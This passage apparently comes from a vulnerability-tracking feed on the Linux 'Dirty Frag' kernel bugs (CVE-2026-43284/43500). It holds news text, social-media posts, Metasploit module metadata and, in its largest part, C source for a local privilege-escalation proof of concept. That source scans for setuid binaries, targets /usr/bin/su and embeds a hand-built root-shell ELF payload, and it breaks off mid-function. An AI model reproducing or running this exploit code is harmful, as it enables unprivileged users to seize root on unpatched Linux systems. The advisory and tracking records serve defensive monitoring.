\u0442\u043e\u043b\u044c\u043a\u043e 
\u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f.\n\nThe disclosure is credited to Zellic researcher William Bowling, who also shared a PoC implementing a kernel memory write primitive used to corrupt the page cache of the /usr/bin/su executable in order to obtain a root shell on systems.\n\nAs the researcher noted, the vulnerability belongs to the Dirty Frag class, which became known last week, and affects all
Linux kernels released before May 13, 2026.\n\nAs with Fragnasia, a publicly available PoC exists for Dirty Frag, which local attackers can use to gain root on major Linux distributions.\n\nHowever, Dirty Frag works by combining two separate kernel vulnerabilities: the xfrm-ESP page-cache write bug (CVE-2026-43284) and the RxRPC page-cache write issue (CVE-2026-43500), which allows privilege escalation by modifying
protected system files in memory.\n\nAlthough Fragnesia belongs to the Dirty Frag class, it is a separate bug in ESP/XFRM for which a separate patch was released. However, it sits on the same surface, and the mitigations for it are the same as for dirtyfrag.\n\nIt uses a logic bug in the Linux XFRM ESP-in-TCP subsystem to write arbitrary bytes into the kernel page cache of read-only files, without requiring
a race condition.\n\nTo protect systems from attacks, Linux users are advised to install kernel updates for their environment as soon as possible, or to use the same mitigation method as the Dirty Frag commands to remove the vulnerable kernel modules.\n\nNotably, Fragnasia appeared just as Linux distribution developers face another, no less important task -
patching Copy Fail, another privilege escalation vulnerability that is currently being actively exploited.\n\nAll this while in April Linux distributions fixed yet another EoP vulnerability (dubbed Pack2TheRoot) in the PackageKit daemon, which had gone unnoticed for ten years.", "creation_timestamp": "2026-05-14T14:01:34.000000Z"}, {"uuid": "454811b6-19e1-4c26-9644-659a9ed3da60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mlw3wxs6rk2z", "content": "Patching Dirty Frag (CVE-2026-43284/CVE-2026-43500) on Oracle Linux? This script works. But after you patch, you need to understand the next 0-day.
Read more ->  tinyurl.com/b8hnx77h", "creation_timestamp": "2026-05-15T19:49:37.364800Z"}, {"uuid": "90ce62b7-9625-495f-8f5e-966b6e26e674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlwshvs3sk2v", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 90 interactions\nCVE-2026-43500: 71 interactions\nCVE-2026-42511: 56 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-42897: 36 interactions\nCVE-2026-20182: 13 interactions\nCVE-2026-42945: 12 interactions\n", "creation_timestamp": "2026-05-16T02:32:20.730258Z"}, {"uuid": "d838d1a3-af9c-43b5-a058-b4c5a1728639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mmbp6a4fv22r", "content": "\ud83d\udce2 Dirty Frag: two Linux vulnerabilities (CVE-2026-43284 and CVE-2026-43500) allow privilege escalation\u2026\ud83d\udcdd \u2026\nhttps://cyberveille.ch/posts/2026-05-20-dirty-frag-deux-vulnerabilites-linux-cve-2026-43284-et-cve-2026-43500-permettent-une-elevation-de-privileges-root/ #CVE_2026_43284 #Cyberveil\u2026", "creation_timestamp": "2026-05-20T10:30:23.037492Z"}, {"uuid": "bc9c8a97-42cd-4716-a5ea-f825887e81b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "published-proof-of-concept", "source": "Telegram/pekQneQSghJS9ruSll4_086gjVL0B0HejJCeE2Ffiq4w67c", "content": "", "creation_timestamp": "2026-05-21T23:00:10.000000Z"}, {"uuid": "2d295cf9-75fd-4e2c-879f-bc63061f6a8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2026_43500_dirty_frag.rb", "content": "{\"actions\": [], \"aliases\": [], \"arch\": \"cmd\", \"author\": [\"Hyunwoo Kim\", \"Giovanni Heward\"], \"autofilter_ports\": [], \"autofilter_services\": [], \"check\": true, \"default_credential\": false, \"description\": \"CVE-2026-43500 exploits a memory-corruption vulnerability in the Linux kernel's RxRPC\\n          authentication subsystem (rxkad). When a crafted DATA packet is delivered to an AF_RXRPC\\n          socket configured with an attacker-controlled rxkad session key, the kernel's\\n          rxkad_verify_packet_1() function performs an in-place 8-byte pcbc(fcrypt) decryption\\n          directly on the page-cache page referenced by the splice offset. Because the decryption\\n          mutates the page in-place without marking it dirty, the corrupted in-memory view is\\n          immediately visible to all processes reading from the page cache. 
This allows a local\\n          attacker to corrupt the in-memory contents of a SUID binary and escalate privileges to root.\", \"disclosure_date\": \"2026-05-08\", \"fullname\": \"exploit/linux/local/cve_2026_43500_dirty_frag\", \"is_install_path\": true, \"mod_time\": \"2026-05-21 11:49:08 +0000\", \"name\": \"rxkad Page-Cache Write via CVE-2026-43500\", \"needs_cleanup\": true, \"notes\": {\"Reliability\": [\"repeatable-session\"], \"SideEffects\": [\"artifacts-on-disk\"], \"Stability\": [\"crash-os-down\"]}, \"path\": \"/modules/exploits/linux/local/cve_2026_43500_dirty_frag.rb\", \"platform\": \"Linux,Unix\", \"post_auth\": false, \"rank\": 400, \"ref_name\": \"linux/local/cve_2026_43500_dirty_frag\", \"references\": [\"CVE-2026-43500\", \"URL-https://github.com/V4bel/dirtyfrag\"], \"rport\": null, \"session_types\": [\"shell\", \"meterpreter\"], \"targets\": [\"Auto\"], \"type\": \"exploit\"}", "creation_timestamp": "2026-05-21T10:50:23.000000Z"}, {"uuid": "b0ae9072-c14f-4560-9285-70fb403d6338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmhyt66qb227", "content": "Active attack: Linux Dirty Frag vulnerability expands post-compromise risk\n\nA newly disclosed Linux local privilege escalation vulnerability known as
\"Dirty Frag\" allows escalation from an unprivileged user to root privileges through vulnerable kernel networking and memory fragment handling components such as esp4, esp6 (CVE-2026-43284) and rxrpc (CVE-2026-43500). Public reports and proof-of-concept activity indicate that this exploit is designed to deliver more reliable privilege escalation than traditional Linux local privilege escalation techniques that depend on race conditions...", "creation_timestamp": "2026-05-22T22:39:13.177285Z"}, {"uuid": "243d205f-1ee6-4f97-bc6e-98d92fc9a35d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "published-proof-of-concept", "source": "Telegram/QUF9weJLwCd1qHdTEuhp0UyLZi4jvqqQc5vVfkezLkJSkiA", "content": "", "creation_timestamp": "2026-05-19T03:00:06.000000Z"}, {"uuid": "0d3be26e-b73f-4a22-b512-12916fb7d21c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/85248", "content": "\ud83d\udea8 GitHub monitoring alert\n\n\ud83d\udea8 
Keywords found: #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 Project name: Dirtyfrag-go\n\ud83d\udc64 Project author: Koshmare-Blossom\n\ud83d\udee0 Language: Go\n\u2b50 Stars: 0  |  \ud83c\udf74 Forks: 0\n\ud83d\udcc5 Updated: 2026-05-21 15:55:35\n\n\ud83d\udcdd Project description:\nA Go implementation of dirtyfrag (CVE-2026-43284 / CVE-2026-43500)\n\n\ud83d\udd17 Click to visit the project", "creation_timestamp": "2026-05-21T16:00:05.000000Z"}, {"uuid": "3509b0e6-24fa-4d1a-8eb8-32cfe41a18a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyr4kgoa2u", "content": "\ud83d\udd17 CVE : CVE-2025-54518, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:18.413608Z"}, {"uuid": "66c64564-ea96-4a4e-9c9e-58f35c5338cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmv6kqysopn2", "content": "Dirty Frag: a kernel zero-day vs. 
container and microVM sandboxes On May 7, Hyunwoo Kim (V4bel) disclosed Dirty Frag \u2014 two Linux kernel vulnerabilities (CVE-2026-43284 and CVE-2026-43500) that gi...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-28T04:26:27.500699Z"}, {"uuid": "a33a231b-aea3-4d29-9f58-276e517078f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/spynika/9c98aca892e18aff2b87d04aa69cc7d7", "content": "#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef UDP_ENCAP\n#define UDP_ENCAP 100\n#endif\n#ifndef UDP_ENCAP_ESPINUDP\n#define UDP_ENCAP_ESPINUDP 2\n#endif\n#ifndef SOL_UDP\n#define SOL_UDP 17\n#endif\n\n#define ENC_PORT       4500\n#define SEQ_VAL        200\n#define REPLAY_SEQ     100\n#define PATCH_OFFSET   0\n#define PAYLOAD_LEN    192\n#define ENTRY_OFFSET   0x78\n#define TOTAL_SAS      (PAYLOAD_LEN / 4)\n#define SPI_BASE       0xDEADBE10u\n\nstatic const char *g_target = \"/usr/bin/su\";\nstatic unsigned char g_backup[PAYLOAD_LEN];\nstatic int g_have_backup = 0;\n\nstatic int g_tty = 0;\nstatic int g_verbose = 0;\nstatic int g_setuid_count = 0;\nstatic int g_exploitable_count = 0;\n\n/* first instructions of embedded shell ELF at file offset 0x78 */\nstatic const uint8_t su_marker[8] = {\n\t0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a,\n};\n\n#define C_RST  \"\\033[0m\"\n#define C_DIM  \"\\033[2m\"\n#define C_RED  \"\\033[31m\"\n#define C_GRN  \"\\033[32m\"\n#define C_YEL  \"\\033[33m\"\n#define C_BLU  \"\\033[34m\"\n#define C_MAG  \"\\033[35m\"\n#define C_CYN  \"\\033[36m\"\n#define C_WHT  \"\\033[1;37m\"\n#define 
C_BOLD \"\\033[1m\"\n\n#define C(x) (g_tty ? (x) : \"\")\n\nstatic void print_banner(void)\n{\n\tprintf(\"\\n\");\n\tprintf(\"%s\", C(C_CYN));\n\tprintf(\"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\"  \u2551  SLEY - CVE-2026-43284 dirtyfrag PoC  \u2551\\n\");\n\tprintf(\"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n}\n\nstatic void status_line(const char *label, int ok, const char *detail)\n{\n\tprintf(\"  %s[%s]%s %-22s\",\n\t       C(C_DIM), ok ? \"+\" : \"-\", C(C_RST), label);\n\tif (detail &amp;&amp; detail[0])\n\t\tprintf(\" %s%s%s\", ok ? 
C(C_GRN) : C(C_RED), detail, C(C_RST));\n\tprintf(\"\\n\");\n}\n\nstatic void phase_header(int n, const char *title)\n{\n\tprintf(\"%s\u250c\u2500[%s phase %d%s] %s%s\\n\",\n\t       C(C_CYN), C(C_MAG), n, C(C_CYN), title, C(C_RST));\n}\n\nstatic int cfg_value_ok(const char *val, const char *expect)\n{\n\tif (!val || !*val)\n\t\treturn 0;\n\tif (strcmp(expect, \"ym\") == 0)\n\t\treturn val[0] == 'y' || val[0] == 'm';\n\treturn strcmp(val, expect) == 0;\n}\n\nstruct kconfig_req {\n\tconst char *key;\n\tconst char *expect;\n\tconst char *hint;\n\tchar val[32];\n\tint found;\n};\n\nstatic void scan_kconfig(FILE *f, struct kconfig_req *req, size_t nreq)\n{\n\tchar line[256];\n\n\tfor (size_t i = 0; i &lt; nreq; i++) {\n\t\treq[i].val[0] = '\\0';\n\t\treq[i].found = 0;\n\t}\n\n\twhile (fgets(line, sizeof(line), f)) {\n\t\tfor (size_t i = 0; i &lt; nreq; i++) {\n\t\t\tif (req[i].found)\n\t\t\t\tcontinue;\n\t\t\tsize_t klen = strlen(req[i].key);\n\t\t\tif (strncmp(line, req[i].key, klen) != 0 || line[klen] != '=')\n\t\t\t\tcontinue;\n\t\t\tconst char *v = line + klen + 1;\n\t\t\tsize_t n = strcspn(v, \"\\n\\r\");\n\t\t\tif (n &gt;= sizeof(req[i].val))\n\t\t\t\tn = sizeof(req[i].val) - 1;\n\t\t\tmemcpy(req[i].val, v, n);\n\t\t\treq[i].val[n] = '\\0';\n\t\t\treq[i].found = 1;\n\t\t}\n\t}\n}\n\nstatic FILE *open_kconfig_gz(const char *src, int *via_popen)\n{\n\tstatic const char *cmds[] = {\n\t\t\"gzip -dc '%s' 2&gt;/dev/null\",\n\t\t\"zcat '%s' 2&gt;/dev/null\",\n\t\tNULL,\n\t};\n\tchar cmd[256];\n\n\tfor (int i = 0; cmds[i]; i++) {\n\t\tsnprintf(cmd, sizeof(cmd), cmds[i], src);\n\t\tFILE *f = popen(cmd, \"r\");\n\t\tif (f) {\n\t\t\t*via_popen = 1;\n\t\t\treturn f;\n\t\t}\n\t}\n\treturn NULL;\n}\n\nstatic FILE *open_kconfig_source(const char *release, char *label, size_t labellen,\n\t\t\t\t int *via_popen)\n{\n\tchar path[512];\n\tFILE *f;\n\n\t*via_popen = 0;\n\n\tsnprintf(path, sizeof(path), \"/boot/config-%s\", release);\n\tf = fopen(path, \"r\");\n\tif (f) 
{\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/build/.config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tif (access(\"/proc/config.gz\", R_OK) == 0) {\n\t\tf = open_kconfig_gz(\"/proc/config.gz\", via_popen);\n\t\tif (f) {\n\t\t\tsnprintf(label, labellen, \"/proc/config.gz\");\n\t\t\treturn f;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nstatic void close_kconfig(FILE *f, int via_popen)\n{\n\tif (!f)\n\t\treturn;\n\tif (via_popen)\n\t\tpclose(f);\n\telse\n\t\tfclose(f);\n}\n\nstatic int check_kernel_config(void)\n{\n\tstruct utsname uts;\n\tchar cfglabel[512];\n\tint via_popen = 0;\n\n\tif (uname(&amp;uts) &lt; 0) {\n\t\tstatus_line(\"uname\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tphase_header(1, \"kernel config preflight\");\n\n\tFILE *cfg = open_kconfig_source(uts.release, cfglabel, sizeof(cfglabel), &amp;via_popen);\n\tif (!cfg) {\n\t\tstatus_line(\"config file\", 0, \"not found under /boot, /lib/modules, /proc\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] WSL2: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr, \"%s  [!] or: grep -E \\\"...\\\" /boot/config-%s%s\\n\\n\",\n\t\t        C(C_YEL), uts.release, C(C_RST));\n\t\treturn -1;\n\t}\n\n\tprintf(\"  %s\u2192%s %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_BLU), cfglabel, C(C_RST));\n\tstatus_line(\"config file\", 1, via_popen ? 
\"via gzip/zcat\" : \"plain text\");\n\n\tstruct kconfig_req req[] = {\n\t\t{ \"CONFIG_USER_NS\",  \"y\",  \"required =y\" },\n\t\t{ \"CONFIG_XFRM\",     \"y\",  \"required =y\" },\n\t\t{ \"CONFIG_INET_ESP\", \"ym\", \"required =m or =y\" },\n\t};\n\tsize_t nreq = sizeof(req) / sizeof(req[0]);\n\tint ok_all = 1;\n\n\tscan_kconfig(cfg, req, nreq);\n\n\tfor (size_t i = 0; i &lt; nreq; i++) {\n\t\tint ok = req[i].found &amp;&amp; cfg_value_ok(req[i].val, req[i].expect);\n\t\tchar detail[128];\n\t\tif (req[i].found)\n\t\t\tsnprintf(detail, sizeof(detail), \"= %s  (%s)\", req[i].val, req[i].hint);\n\t\telse\n\t\t\tsnprintf(detail, sizeof(detail), \"missing (%s)\", req[i].hint);\n\t\tstatus_line(req[i].key, ok, detail);\n\t\tif (!ok)\n\t\t\tok_all = 0;\n\t}\n\n\tclose_kconfig(cfg, via_popen);\n\n\tprintf(\"\\n\");\n\tif (!ok_all) {\n\t\tfprintf(stderr, \"%s  [!] kernel does not meet exploit requirements.%s\\n\", C(C_RED), C(C_RST));\n\t\tfprintf(stderr, \"%s  [!] manual check: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\\n\",\n\t\t        C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"%s  kernel options OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic void print_sysctl_val(const char *path, const char *name)\n{\n\tFILE *f = fopen(path, \"r\");\n\tif (!f)\n\t\treturn;\n\tchar val[64];\n\tif (!fgets(val, sizeof(val), f)) {\n\t\tfclose(f);\n\t\treturn;\n\t}\n\tval[strcspn(val, \"\\n\\r\")] = '\\0';\n\tprintf(\"      %s%s%s = %s\\n\", C(C_DIM), name, C(C_RST), val);\n\tfclose(f);\n}\n\nstatic int check_userns_runtime(void)\n{\n\tphase_header(2, \"user namespace runtime check\");\n\tprintf(\"  %s\u2192%s unshare(CLONE_NEWUSER | CLONE_NEWNET)%s\\n\\n\",\n\t       C(C_DIM), C(C_RST), C(C_DIM));\n\n\tif (getuid() == 0) {\n\t\tstatus_line(\"privilege\", 0, \"running as root \u2014 use an unprivileged user for LPE\");\n\t\tfprintf(stderr, \"\\n%s  [!] 
Exploit is meant to run as a normal user (uid != 0).%s\\n\\n\",\n\t\t        C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tpid_t pid = fork();\n\tif (pid &lt; 0) {\n\t\tstatus_line(\"fork\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) &lt; 0)\n\t\t\t_exit(1);\n\t\t_exit(0);\n\t}\n\n\tint st;\n\tif (waitpid(pid, &amp;st, 0) &lt; 0) {\n\t\tstatus_line(\"waitpid\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint ok = WIFEXITED(st) &amp;&amp; WEXITSTATUS(st) == 0;\n\tif (!ok) {\n\t\tstatus_line(\"unshare\", 0, \"Operation not permitted\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] CONFIG_USER_NS=y in /boot/config does not guarantee unprivileged userns at runtime.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] This host blocks user namespaces (common on hardened Ubuntu 22.04+ / enterprise VMs).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] Changing the setuid target (su/sudo/pkexec) will not help \u2014 unshare must succeed first.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tprintf(\"\\n  %sRelevant sysctls on this host:%s\\n\", C(C_DIM), C(C_RST));\n\t\tprint_sysctl_val(\"/proc/sys/kernel/apparmor_restrict_unprivileged_userns\",\n\t\t\t\t \"kernel.apparmor_restrict_unprivileged_userns\");\n\t\tprint_sysctl_val(\"/proc/sys/kernel/unprivileged_userns_clone\",\n\t\t\t\t \"kernel.unprivileged_userns_clone\");\n\t\tprint_sysctl_val(\"/proc/sys/user/max_user_namespaces\",\n\t\t\t\t \"user.max_user_namespaces\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] Lab only (as root): sysctl -w kernel.apparmor_restrict_unprivileged_userns=0%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] 
Without userns: this PoC cannot run (see CVE-2026-43500 rxrpc variant).%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tstatus_line(\"unshare\", 1, \"user+net namespace available\");\n\tprintf(\"%s  runtime userns check OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic int skip_tree(const char *path)\n{\n\treturn strcmp(path, \"/proc\") == 0 ||\n\t       strcmp(path, \"/sys\") == 0 ||\n\t       strcmp(path, \"/dev\") == 0 ||\n\t       strcmp(path, \"/run\") == 0;\n}\n\nstatic int target_is_exploitable(const char *path)\n{\n\tstruct stat st;\n\n\tif (stat(path, &amp;st) &lt; 0 || !S_ISREG(st.st_mode))\n\t\treturn 0;\n\tif (!(st.st_mode &amp; S_ISUID))\n\t\treturn 0;\n\tif (access(path, R_OK | X_OK) != 0)\n\t\treturn 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd &lt; 0)\n\t\treturn 0;\n\tclose(fd);\n\treturn 1;\n}\n\nstatic int probe_target(const char *path, char *why, size_t whylen)\n{\n\tstruct stat st;\n\n\tif (stat(path, &amp;st) &lt; 0) {\n\t\tsnprintf(why, whylen, \"missing (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!S_ISREG(st.st_mode)) {\n\t\tsnprintf(why, whylen, \"not a regular file\");\n\t\treturn -1;\n\t}\n\tif (!(st.st_mode &amp; S_ISUID)) {\n\t\tsnprintf(why, whylen, \"no setuid bit (mode %04o)\", st.st_mode &amp; 07777);\n\t\treturn -1;\n\t}\n\tif (access(path, R_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not readable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (access(path, X_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not executable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tint fd = open(path, O_RDONLY);\n\tif (fd &lt; 0) {\n\t\tsnprintf(why, whylen, \"open(O_RDONLY) denied (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tclose(fd);\n\twhy[0] = '\\0';\n\treturn 0;\n}\n\nstatic int setuid_walk(const char *path, const struct stat *st, int flag,\n\t\t       struct FTW *ftw)\n{\n\t(void)ftw;\n\tif (flag == FTW_D &amp;&amp; skip_tree(path))\n\t\treturn FTW_SKIP_SUBTREE;\n\n\tif (flag != 
FTW_F)\n\t\treturn 0;\n\n\tif (!S_ISREG(st-&gt;st_mode))\n\t\treturn 0;\n\tif (!(st-&gt;st_mode &amp; S_ISUID))\n\t\treturn 0;\n\n\tg_setuid_count++;\n\tint exploitable = target_is_exploitable(path);\n\tif (exploitable)\n\t\tg_exploitable_count++;\n\n\tint is_target = (strcmp(path, g_target) == 0);\n\tconst char *color = exploitable ? C(C_GRN) : C(C_YEL);\n\tconst char *badge = exploitable ? \"[+]\" : \"[~]\";\n\n\tprintf(\"  %s%02d%s %s%s%s %s%s%s%s\\n\",\n\t       C(C_DIM), g_setuid_count, C(C_RST),\n\t       color, badge, C(C_RST), path,\n\t       is_target ? \"  \u2190 target\" : \"\",\n\t       exploitable ? \"\" : \"  (visible, not usable)\",\n\t       C(C_RST));\n\treturn 0;\n}\n\nstatic int scan_setuid_binaries(void)\n{\n\tphase_header(3, \"setuid binary scan\");\n\tprintf(\"  %s\u2192%s find / -perm -4000 -type f 2&gt;/dev/null%s\\n\\n\",\n\t       C(C_DIM), C(C_RST), C(C_DIM));\n\n\tg_setuid_count = 0;\n\tg_exploitable_count = 0;\n\tint rc = nftw(\"/\", setuid_walk, 32, FTW_PHYS | FTW_MOUNT);\n\n\tprintf(\"\\n\");\n\tif (rc != 0 &amp;&amp; rc != EACCES) {\n\t\tstatus_line(\"nftw\", 0, strerror(rc &gt; 0 ? rc : errno));\n\t}\n\tif (g_setuid_count == 0) {\n\t\tstatus_line(\"setuid\", 0, \"no SUID binaries found\");\n\t\treturn -1;\n\t}\n\tprintf(\"%s  found %d setuid binaries, %d exploitable (readable + openable).%s\\n\",\n\t       g_exploitable_count ? C(C_GRN) : C(C_YEL),\n\t       g_setuid_count, g_exploitable_count, C(C_RST));\n\tif (g_exploitable_count == 0) {\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s  [!] SUID files are visible but not readable \u2014 typical on shared hosting (CageFS/cPanel).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s  [!] This exploit must open the target for read (splice). 
No usable target on this account.%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"\\n\");\n\treturn 0;\n}\n\n// minimal x86_64 root-shell ELF, entry=0x400078\n// setgid(0); setuid(0); execve(\"/bin/sh\", NULL, [\"TERM=xterm\",NULL]) \nstatic const unsigned char shell_elf[PAYLOAD_LEN] = {\n\t0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,\n\t0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,\n\t0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,\n\t0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,\n\t0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n};\n\nstatic int save_original(const char *path)\n{\n\tif (g_have_backup) return 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd &lt; 0) return -1;\n\tint n = read(fd, g_backup, PAYLOAD_LEN);\n\tclose(fd);\n\tif (n != PAYLOAD_LEN) return -1;\n\tg_have_backup = 1;\n\treturn 0;\n}\n\nstatic int setup_userns_netns(void)\n{\n\tuid_t ruid = getuid();\n\tgid_t rgid = getgid();\n\n\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) &lt; 0) {\n\t\tfprintf(stderr, \"unshare: %s\\n\", strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint fd = open(\"/proc/self/setgroups\", O_WRONLY);\n\tif (fd &gt;= 0) { write(fd, \"deny\\n\", 5); close(fd); }\n\n\tchar buf[128];\n\tsnprintf(buf, sizeof(buf), 
